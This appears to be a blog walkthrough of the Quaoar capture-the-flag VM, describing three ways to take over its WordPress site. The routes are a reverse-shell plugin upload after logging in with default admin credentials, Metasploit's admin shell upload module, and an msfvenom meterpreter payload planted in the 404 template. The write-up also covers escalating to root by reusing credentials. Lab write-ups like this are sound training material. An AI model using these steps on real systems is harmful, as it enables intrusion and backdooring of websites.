Hackfest 2016- Quaoar VM Walkthrough / Writeup
Vulnhub.com — Quaoar VM Walkthrough
Three Different Techniques to exploit a machine
This VM was made for hack fest 2016 and is listed as very easy. I had this one done in under an two hour with three different Techniques.
Welcome to Quaoar This is a vulnerable machine which is created for http://hackfest.ca/
Difficulty : Very Easy
Tips:
Here are the tools you can research to help you to own this machine. nmap, dirb / dirbuster / BurpSmartBuster, nikto, wpscan, hydra Your Brain Coffee Google :)
Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box
Different Techniques to Exploit :
Reverse Shell Plugin Upload Metasploit Wordpress Exploit Payload Payload post in 404 page
So Start with 1st Technique:-
- Reverse Shell Plugin Upload
Let’s get started with old faithful, arp-scan for it’s network location.
Command : arp-scan -l
Followed by the obligatory NMAP, lots of interesting things going on here…
Command : nmap -p- (ip)
Although there was lots to see, I went straight for port 80 due to the self proclaimed ‘very easy’ difficulty and fired up nikto. Immediately I can see this is a word press install.
Command : nikto -h (ip)
Nikto Scan in 80 port |
So firing up WPScan and enumerating for usernames. we get the default admin entry.
Command : Wpscan — url www.example.com — enumerate u
Where there is a default admin entry there is highly likely to be a default admin password (admin:admin). I didn’t even look at the landing page at this point, going directly to /wordpress/wp-login.php and trying out my theory..
And as you can see we get straight into the WordPress portal..
At this stage I decided to create a WordPress plug-in that I could use to generate a reverse shell. Taking the out of the box php back-door from Kali (/usr/share/webshell/php/php-reverse-shell.php) and making the following amendments to it…
Change the ip (local ip) and port on reverse shell php and zip the updated file.
The headers are required so when you zip the php file , it will recognise it as a WordPress plug-in and install it. You can see in the below screen grab rev.zip
But if you go to installed plug-ins after this you will see it has actually installed with the plug-in name. Great for obfuscating your back door.
Netcat its on listen mode
Command : nc -nlvvp port(4444)
Activating the plug-in from here and catching it with a net-cat listener.
Wow :) Session created |
A recursive lookup through the /home directories and we find our first flag.
Got First Flag :) |
Now I started this post by saying it had many similarities to Stapler, well one of this similarities was the wp-config containing mysql credentials. The thing with these creds is that they indicate not mysql but actual root credentials.
So assuming shared credentials between the two accounts:
Try to root and we are in as root. There is a flag in /root/ and we already had the other.
Command : su root
Grep the Second Flag |
And for the last flag,
Check in cron php file.
Location : cd /etc/cron.d/
Command : cat php5
Finally got third Flag :) |
- Metasploit Wordpress Payload Exploit
Using the admin username, i was able to access the wordpress admin dashboard with the password ‘admin’.
From here, it was then possible to get a reverse shell using metasploit (exploit/unix/webapp/wp_admin_shell_upload).
Command : use exploit/unix/webapp/wp_admin_shell_upload
Command : show options
After Session created follow above steps to get the flag :)
- Reverse TCP Payload post in 404 page
I created a php file with the meterpreter payload as shown in the following image:
Command : msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip] LPORT=[PORT] -f raw > shell.php
Then I added the shell code to the 404 page using the wordpress theme editor.
Wordpress Admin > Appearance > Editor > Template
I started
msfconsole
and set up the listener.
Command :
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
Once I finished, I just forced a 404 error on wordpress by fetching an unexisting post id.
Yupieee :) I got a shell to the server
So now follow 1st Technique to grep flags :)
Job Done……………..
Excellent Boss !! Keep it Up :)
ReplyDeleteI felt very Proud , Thank You God :)
Thanks brother :)
Delete